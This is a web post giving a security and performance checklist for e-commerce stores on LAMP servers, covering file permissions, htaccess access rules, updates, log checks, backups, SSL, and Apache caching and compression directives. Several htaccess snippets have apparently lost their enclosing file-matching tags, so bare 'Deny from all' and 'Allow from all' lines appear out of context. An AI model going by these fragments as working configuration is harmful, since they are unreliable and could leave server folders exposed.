Here is a list of basic security measures you can carry out to protect your store. Use it as a checklist and consider implementing any missing from your server’s security policy. Some of security steps have certain server requirements that may or may not be available to you, depending on your hosting plan. This post is for stores on Linux servers with LAMP (LinuxApacheMysqlPhp) configurations.
These ideas come from a variety of sources, in particular zen-cart which includes a number of useful security features and recommendations in its cart.
Check and Set Permissions
Permissions are assigned to each folder and file which indicate access rights to specific users or groups.
- Folders should be a maximum of 755, however certain folders – /images; /admin/backups; /tmp; may require 757 for writing to, depending on your server configuration. All files should be 644 (configure.php files 444 if possible)
Disable the ‘Allow Guest to Tell a Friend’ feature
Some carts allow visitors to the site to send emails through this feature. By disabling this feature, you will prevent non-logged-in customers from using your server to send ‘spam’ email messages.
Update your store and module software to the latest versions and patches
With every new software release, there are usually security or bug fixes which improve the functionality and stability of your store. If you donâ¬”t upgrade, hackers will be able to easily exploit your websites from known vulnerabilities.
Use local htaccess files to restrict script execution, access
For local htaccess files to work, the server must be setup to allow this, usually in with the command ‘AllowOverride All’ or ‘AllowOverride Limit’ in the apache/conf/httpd.conf file. Check with your hosting company if this is configured.
- In the htaccess file itself, start by denying access to everything:
Deny from all
Then allow access to only certain files:
Allow from all
For example, the /images folder:
Allow from all
Prevent these variables from being used in say the /cache folder:
Deny from All
If a folder of downloads, the code can be added so the file is treated automatically as ‘Save As’ and not run as an application:
Order Allow, Deny
Allow from all
Header set Content-Disposition attachment
If you want to prevent snoopers from listing the contents of a folder, there are several ways to do this. The first thing to establish is whether your hosting company already does this via the Apache config file. Ask your hosting company if the following exist in the Apache config file:
Options -Indexes -ExecCGI
(the -ExecCGI is particularly useful as it prevents hackers executing scripts in the folder)
If not, ask what the DirectoryIndex is set to (usually it will be “index.php”) – if this is the case, you can add this to a local htaccess file :
or you can create a blank index.php and upload that to the folder
Monitor your error and access logs
You’re looking for suspicious entries here – any links that go to pages not on your site; links that have http after the index.php; that sort of thing. Your store my have /error or /debug folders in its directory structure – check here too.
Backup your store regularly
mySQL database – this can be done through Admin/Tools/Mysql Backup. Use whatever compression is available. Avoid downloading the compressed backup over an unsecured (http://) connection. The zipped backup file is created in admin/backups, so consider how to secure this folder too.
Your store’s files – these AREN’T saved using the mySQL backup and must be done separately. Basically you need a copy of everything in /catalog (or ‘root’ which may be called ‘public_html’.)
Server settings – more applicable to stores running on their own server (in which case you should have a maintenance program set up already), however check with your hosting company to see how they manage backing up the server configurations.
Check with hosting company on what they have done to make your site secure
Your store can be severely compromised if your hosting company hasn’t correctly secured the server. There are many configuration features that can be enabled by them (eg suHosin, apache config settings and php.ini settings are a few) – so it pays to be clear on what they’re doing to make your store more secure. This is particularly important if you’re running on a shared server and using shared SSL (not recommended.)
Get a dedicated SSL certificate and static IP address for your store
This will help in many ways and if you’re serious about presenting a dependable, secure store, these are essential requirements.
If your business warrants, or you still want additional assurance (esp if running forum software on your site, or other scripts outside of your e-cart software), hire a security consultant to check your site regularly and give you peace of mind in exchange for a few dollars.
Check this post about securing your admin with specific points related to this important utility’s function. The admin is often the point of entry for hacking attempts.
Another useful Apache utility called mod_headers can be used to set an expiration date in the future of files like images and static html pages. This means that rather than loading image files or unchanging html code every time you visit a site, a check will be made in the cache of your browser to see if there is already an existing copy of the file requested. If the file is still ‘fresh’ – ie within the period specified by the expiration, the cached version of the file will be used and no ‘refresh’ call will be made to the host server.
Your server needs to have mod_headers enabled before being able to use these directives. You can add this code to your root htaccess file, or http.conf / vhosts.conf if you have access to those.
#cache html and htm files for one day
Header set Cache-Control "max-age=43200"
Header set Cache-Control "max-age=604800"
#cache flash and images for one month
Header set Cache-Control "max-age=2592000"
#disable cache for script files
Header unset Cache-Control
When changing conf files on an Apache server, remember to Apply Changes and restart the Apache server for the directives to take effect.
Another approach is to use ExpiresByType commands in the htaccess file:
# turn on the module for this directory
# set default
ExpiresDefault "access plus 24 hours"
ExpiresByType image/jpg "access plus 1 months"
ExpiresByType image/gif "access plus 1 months"
ExpiresByType image/jpeg "access plus 1 months"
ExpiresByType image/png "access plus 1 months"
ExpiresByType image/x-icon "access plus 1 months"
ExpiresByType text/css "access plus 1 months"
ExpiresByType application/x-shockwave-flash "access plus 1 months"
Final tip: set eTags to null using:
Header unset ETag
If your server is running Apache 2.xx then mod_deflate can be used to compress certain file types, which will give a real boost in loading speed as the client’s browser will be uncompressing the content, rather than the server carrying the full load.
To enable mod_deflate, add the following to root htaccess (or ideally http.conf or if on a virtual server, vhosts.conf)
If your server is running Apache 1.x then mod_gzip can be used. This can be added to the root htaccess file.
mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text.*
mod_gzip_item_exclude mime ^image.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
You might also like to enable Gzip Compression through Admin/Configuration/Gzip Compression, set at 9.